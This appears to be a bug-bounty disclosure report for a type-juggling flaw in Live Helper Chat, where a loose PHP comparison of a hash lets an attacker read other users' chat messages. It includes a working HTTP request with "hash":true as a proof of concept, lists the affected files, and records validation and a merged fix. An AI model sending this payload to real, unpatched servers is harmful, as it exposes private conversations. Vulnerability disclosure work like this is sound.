Loose comparison causes IDOR on multiple endpoints in livehelperchat/livehelperchat

Valid

Reported on

Mar 29th 2022


Description

Live Helper Chat is vulnerable to Type Juggling on the requestPayload['hash']. The application uses a Loose Comparison to check if the user-controlled parameter is equal to an hash, this check is vulnerable because it's possible to pass other Data Types via JSON that causes the if condition to be True. This occurs on multiple endpoints.

Proof of Concept

For the PoC, the vulnerability resides on https://github.com/LiveHelperChat/livehelperchat/blob/master/lhc_web/modules/lhwidgetrestapi/fetchmessage.php#L19

    if ($chat instanceof erLhcoreClassModelChat && $chat->hash == $requestPayload['hash'])
  1. Request
POST /eng/widgetrestapi/fetchmessages HTTP/1.1
Host: demo.livehelperchat.com
Cookie: lhc_vid=eb9bc0c044919538c5b1
Content-Length: 62
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.livehelperchat.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.livehelperchat.com/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"chat_id":2,"hash":true,"lmgsid":1,"theme":1,"new_chat":true}

Note the "hash":true, this will make the if always return True.

The loose comparison can be solved by using a type safe check === or updating PHP to 8 <=.

I've attached more occurrences of the same vulnerability: modules/lhwidgetrestapi/fetchmessage.php modules/lhwidgetrestapi/fetchmessages.php modules/lhwidgetrestapi/getmessagesnippet.php modules/lhwidgetrestapi/initchat.php modules/lhwidgetrestapi/uisettings.php

Impact

It's possible to bypass multiple checks. An attacker could access private information of other users.

We are processing your report and will contact the livehelperchat team within 24 hours. 6 months ago
We have contacted a member of the livehelperchat team and are waiting to hear back 6 months ago
Remigijus Kiminas validated this vulnerability 6 months ago
Caio Lüders has been awarded the disclosure bounty
The fix bounty is now up for grabs
Remigijus Kiminas confirmed that a fix has been merged on 72c0df 6 months ago
The fix bounty has been dropped
fetchmessage.php#L19 has been validated
getmessagesnippet.php#L19 has been validated
uisettings.php#L19 has been validated
initchat.php#L32 has been validated
fetchmessages.php#L37 has been validated
to join this conversation